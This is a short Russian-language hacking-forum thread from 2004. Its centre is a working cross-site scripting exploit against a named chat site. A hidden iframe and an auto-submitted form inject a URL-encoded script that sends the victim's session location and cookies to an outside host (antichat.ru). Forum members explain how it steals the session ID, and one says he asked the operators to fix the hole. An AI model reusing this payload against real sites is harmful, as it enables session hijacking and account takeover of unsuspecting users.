Чаты Для, знающих !!!

Discussion in 'Веб-уязвимости' started by Guest, 17 Sep 2004.

  1. Fr1k

    Fr1k Elder - Старейшина

    Joined:
    11 Jun 2004
    Messages:
    252
    Likes Received:
    4
    Reputations:
    0
    а вообще если чесно то я совсем не понял смыл этого кода
    <iframe name="sniff" id="sniff" width="0" height="0"></iframe>

    <form action="http://chat.gekkon.net/users.php" method="post" target="sniff">
    <input type="hidden" name="look_for" value="">
    </form>

    <script type=&quot;text/javascript&quot;&gt;

    document.forms[0].elements[0].value=unescape('%3C%73%63%72%69%70%74%3E%7A%3D%77%69%6E%64%6F%77%2E%6F%70%65%6E%28%27%27%2C%27%76%6F%63%5F%73%65%6E%64%65%72%27%29%3B%78%3D%6E%65%77%20%49%6D%61%67%65%28%29%3B%78%2E%73%72%63%3D%27%68%74%74%70%3A%2F%2F%61%6E%74%69%63%68%61%74%2E%72%75%2F%63%67%69%2D%62%69%6E%2F%73%2E%6A%70%67%3F%27%2B%7A%2E%6C%6F%63%61%74%69%6F%6E%2B%27%23%23%23%27%2B%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%3B%3C%2F%73%63%72%69%70%74%3E&#39[​IMG];
    document.forms[0].submit();

    &lt;/script&gt;

    ХМ... помоему он совсем не нужен!!! ГЫ результат то ты видел сам итоговый?
     
  2. zFailure

    zFailure Elder - Старейшина

    Joined:
    6 Jun 2004
    Messages:
    163
    Likes Received:
    24
    Reputations:
    24
    смысл очень просто в скрытый фрем отсылается форма с кодом

    в свою очередь код выполняется

    в коде идет обращение к окну по его имени и берется идентификатор сессии из переменной location и отправляется
     
  3. Fr1k

    Fr1k Elder - Старейшина

    Joined:
    11 Jun 2004
    Messages:
    252
    Likes Received:
    4
    Reputations:
    0
    всё!!! ясно!!! ну вообщем я попросил тчоб в том чате убрали с 8080 порта его!!! так что сказали уберут!!! теперь можешь глянуть!